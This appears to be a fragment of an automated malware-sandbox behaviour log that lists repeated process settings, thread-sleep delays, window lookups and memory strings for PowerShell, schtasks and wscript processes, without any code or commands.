      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4291Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5564Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4790Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4861Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4592
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4678
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5214
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3389
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160Thread sleep time: -15679732462653109s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep time: -21213755684765971s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep time: -15679732462653109s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1912Thread sleep time: -12912720851596678s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 576Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: powershell.exe, 00000000.00000002.1375410918.00000207C43AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 0000000C.00000002.1457580508.0000022868EE3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1834740805.00000178DB33C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
